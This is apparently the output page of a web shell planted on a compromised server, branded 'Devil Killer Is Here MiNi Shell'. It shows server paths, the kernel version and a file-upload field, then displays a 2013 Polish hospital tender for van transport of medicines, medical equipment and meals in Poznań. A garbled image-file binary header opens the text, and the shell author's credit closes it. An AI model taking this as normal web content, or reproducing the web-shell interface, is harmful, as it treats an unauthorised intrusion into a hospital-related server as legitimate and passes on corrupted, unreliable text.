JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/217021-N-2013.html

<p class="kh_header"><b>Poznań: Wynajem furgonu wraz z kierowcą.</b><br>
<b>Numer ogłoszenia: 217021 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Kliniczny im. Heliodora Święcickiego Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Przybyszewskiego 49, 60-355 Poznań, woj. wielkopolskie, tel. 061 8691759, faks 061 8691847.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spsk2.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem furgonu wraz z kierowcą..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Wynajem furgonu wraz z kierowcą do świadczenia usług transportu produktów  leczniczych wraz z załadunkiem na terenie Poznania		
Wynajem furgonu wraz z kierowcą do świadczenia usług transportu wraz z załadunkiem produktów leczniczych z Apteki Szpitala Klinicznego im. Heliodora Święcickiego przy ul. Przybyszewskiego 49 do Apteki Specjalistycznego Szpitala Klinicznego przy ul. Grunwaldzkiej 16/18 lub do Centrum Stomatologii przy ul. Bukowskiej 70 w Poznaniu	
ilość kursów - 251

Wymogi pojazdu i transportu produktów leczniczych:					
 - Przestrzeń ładunkowa typu Izoterma umożliwiająca transport produktów leczniczych w warunkach temp. +4 st. C - +25 st. C					
- Prowadzenie rejestru temperatur wraz z jej archiwizacją przez okres 3 lat 					
- Samochód wyposażony w lodówkę umożliwiającą transport leków termolabilnych				
- Lodówka wyposażona w monitor temperatur 					
- Transport produktów leczniczych w dni robocze od poniedziałku do piątku  ( 251 dni w roku ) 1 raz dziennie w godzinach od 12.00 - 12.30	
 -  za załadunek i rozładunek odpowiada kierowca	



B. Wynajem furgonu wraz z kierowcą do świadczenia usług transportu sprzętu medycznego wraz z załadunkiem na terenie Poznania
Wynajem furgonu wraz z kierowcą do świadczenia usług transportu sprzętu medycznego wraz z załadunkiem do i ze Specjalistycznego Szpitala Klinicznego przy ul. Grunwaldzkiej 16/18  do Centralnej Sterylizacji Szpitala Klinicznego przy ul. Przybyszewskiego 49 w Poznaniu.
ilość kursów - 1 488

Wymogi transportu sprzętu medycznego czystego i brudnego:
 - Samochód z podnośnikiem wraz z możliwością mocowania wózków transportowych w przestrzeni transportowej
 - Samochód powinien podczas trwania jednego kursu przewieźć od 7 - 8 wózków jednorazowo ( 1 wózek ok. 300 kg, wymiary 1260x680x1240)
 - Powierzchnia ładunkowa samochodu powinna być wykonana z materiału łatwego do dezynfekcji i zmywania
 - Powierzchnia ładunkowa samochodu powinna być podzielona ściana grodziową, przesuwaną, wykonaną z materiału łatwego do dezynfekcji, na dwie osobne strony, czystą  i brudną, konieczność przewozu naraz wózków stref czystej i brudnej (w przypadku braku możliwości przewozu za jednym kursem wszystkich wózków możliwy jest oddzielny przewóz obu stref (najpierw czysta) w ramach jednego kursu rozliczeniowego)
 -  wykonawca musi prowadzić książkę dezynfekcji  pojazdu we własnym zakresie zapewnić mycie i dezynfekcję pojazdu po brudnym transporcie.
 -  za załadunek i rozładunek odpowiada kierowca 
   
Godziny transportów:     
Od poniedziałku do soboty godzina 06:30

06.30  - z Centralnej Sterylizacji Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 do lokalizacji przy ul Grunwaldzkiej 16/18 w Poznaniu	
14.30 - ze lokalizacji przy ul. Grunwaldzkiej 16/18 do Centralnej Sterylizacji Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 w Poznaniu
19.00  - ze lokalizacji przy ul. Grunwaldzkiej 16/18 do Centralnej Sterylizacji Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 w Poznaniu
22.00 - ze lokalizacji przy ul. Grunwaldzkiej 16/18 do Centralnej Sterylizacji  Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 w Poznaniu

UWAGA: Transport sprzętu medycznego odbywać się będzie 24h na dobę w tym 4 razy dziennie o stałych godzinach, transporty mogą odbywać się także na wezwanie telefoniczne, podstawienie samochodu musi  nastąpić nie później niż w ciągu  jednej godziny.

Od soboty godzina 07:30 do niedzieli oraz dni ustawowo wolne od pracy

Sobota godzina 07.30  - z Centralnej Sterylizacji Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 do lokalizacji przy ul Grunwaldzkiej 16/18 w Poznaniu
Sobota godzina 12.030  - z Centralnej Sterylizacji Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 do lokalizacji przy ul Grunwaldzkiej 16/18 w Poznaniu

Sobota 15.00 oraz 19:00 - ze lokalizacji przy ul. Grunwaldzkiej 16/18 do Centralnej Sterylizacji  Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 w Poznaniu

UWAGA: Transport sprzętu medycznego może odbywać się w sobotę do  godziny 20:00 w tym 3 razy dziennie o stałych godzinach, transporty mogą odbywać się także na wezwanie telefoniczne, podstawienie samochodu musi  nastąpić nie później niż w ciągu  jednej godziny.

Niedziela oraz dni ustawowo wolne od pracy 
- godzina 08.00  - z Centralnej Sterylizacji Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 do lokalizacji przy ul Grunwaldzkiej 16/18 w Poznaniu
- godzina 09.00  - ze lokalizacji przy ul. Grunwaldzkiej 16/18 do Centralnej Sterylizacji  Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 w Poznaniu
- godzina 15.00 oraz 19:00 - ze lokalizacji przy ul. Grunwaldzkiej 16/18 do Centralnej Sterylizacji  Szpitala Klinicznego im. Heliodora Święcickiego przy ul Przybyszewskiego 49 w Poznaniu

UWAGA: Transport sprzętu medycznego może odbywać się w niedzielę od godziny 08:00 w tym 4 razy dziennie o stałych godzinach, transporty mogą odbywać się także na wezwanie telefoniczne, podstawienie samochodu musi  nastąpić nie później niż w ciągu  jednej godziny.


C. Wynajem furgonu wraz z kierowcą do świadczenia usług transportu produktów spożywczych wraz z załadunkiem na terenie Poznania
Wynajem furgonu wraz z kierowcą do świadczenia usług transportu wraz z załadunkiem produktów spożywczych z Kuchni Szpitala Klinicznego im. Heliodora Święcickiego przy ul. Przybyszewskiego 49 do Kuchni Specjalistycznego Szpitala Klinicznego przy ul. Grunwaldzkiej 16/18 w Poznaniu
ilość kursów - 1 098
Wymogi pojazdu i transportu produktów spożywczych
Transport  produktów spożywczych odbywać się będzie 365 dni w roku 3 razy dziennie w godzinach :
- śniadanie - 
wyjazd ze Szpitala Klinicznego im Heliodora Święcickiego o godz. 7.30
a)	7 szt pojemników termicznych o wym. 64x43,5x30,5		
b)	10 szt termosów 10 l.					

- obiad - 
wyjazd ze Szpitala Klinicznego im. Heliodora Święcickiego o godz. 12.00
a)	1 szt. pojemnik termiczny
b)	6 szt termosy 15 l.		
c)	13 szt. termosy 10 l.					

- kolacja -
wyjazd ze Szpitala Klinicznego im. Heliodora Święcickiego o godz. 16:00
a)	7 szt pojemniki termiczne				
b)	10 szt termosy 10 l.					


Zamawiający zapewnię wózki transportowe - 2 szt, które wystarczają do przewozu pełnego posiłku
wózki muszą zostać przymocowane na czas transportu.

Transport musi być zgodny z Rozporządzenie Ministra Zdrowia z dnia 19 grudnia 2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności, substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności (Dz.U. 2003 nr 21 poz. 179)

Transport musi być zgłoszony o zatwierdzenie do Sanepidu gdzie na podstawie oględzin pojazdu (typu, marki i nr. rejestracyjny) zostanie wydana decyzja			
 - Kierowca pojazdu musi być na stałe oddzielony od pomieszczenia transportowego
 - Powierzchnia transportowa auta musi być wykonana z materiału łatwo zmywalnego
- Za mycie i dezynfekcje odpowiada wykonawca, na potwierdzenie czego będzie prowadził rejestr ww czynności podający ich daty, środki użyte
	 - Za załadunek i rozładunek odpowiada kierowca
	- Przestrzeń ładunkowa typu Izoterma transport w warunkach temp. +4 st. C - +10 st. C
	- Prowadzenie rejestru temperatur wraz z jej archiwizacją przez okres 3 lat.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.18.30.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oświadcza, że transporty w zakresie pozycji nr 2 będą odbywały się zgodnie z wymogami określonymi w międzynarodowej konwencji dotyczącej drogowego przewozu towarów i ładunków niebezpiecznych, sporządzonej w Genewie dnia 30 września 1957r. w klasie przewozów 6.2 dla transportu materiałów zakaźnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oświadcza, że transporty w zakresie pozycji nr 2 będą odbywały się zgodnie z wymogami określonymi w międzynarodowej konwencji dotyczącej drogowego przewozu towarów i ładunków niebezpiecznych, sporządzonej w Genewie dnia 30 września 1957r. w klasie przewozów 6.2 dla transportu materiałów zakaźnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pozytywna Opinia Wojewódzkiej Stacji Sanitarno - Epidemiologicznej dla środków transportu sprzętu medycznego oraz transportu produktów spożywczych;</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. cena nie może zostać podwyższona przez cały okres obowiązywania umowy, chyba że dojdzie do zmiany stawki podatku VAT
2. Zmiana umowy może obejmować 
w zakresie dozwolonym przez prawo:
a.	zmianę jakości, parametrów lub innych cech charakterystycznych dla przedmiotu zamówienia, 
b.	zmianę terminu realizacji poszczególnych elementów przedmiotu umowy,
c.	zmianę ilości szczegółowego asortymentu objętego przedmiotem zamówienia zgodnie z uzasadnionymi potrzebami Zamawiającego, jeśli w wyniku tych zmian nie nastąpi zwiększenie wartości umowy w zakresie danego pakietu.
d.	obniżenia ceny netto
3.	Warunkami dokonania zmian wskazanych w pkt. 2 mogą być:
a.	nastąpi zmiana organizacyjna leżąca po stronie Zamawiającego, 
b.	wymagać tego będzie prawidłowa realizacja przez Zamawiającego zadań polegających na wykonywaniu świadczeń działalności podstawowej (statutowej).
c.	w wyniku zmiany Umowy możliwe będzie podniesienie poziomu/jakości udzielanych świadczeń medycznych wykonywanych przez Zamawiającego albo/lub w wyniku zmiany Umowy możliwe będzie podniesienie poziomu/jakości działalności statutowej Zamawiającego
d.	będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenie awarii, 
albo będzie to konieczne ze względu na zmianę powszechnie obowiązujących przepisów prawa
e.	zmiana w inny sposób dostarczy pożytku Zamawiającemu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spsk2.pl/zp/pokaz2.php?n=305_2013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego wejście O pokój 5a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 09:00, miejsce: siedziba zamawiającego wejście C kancelaria glona szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com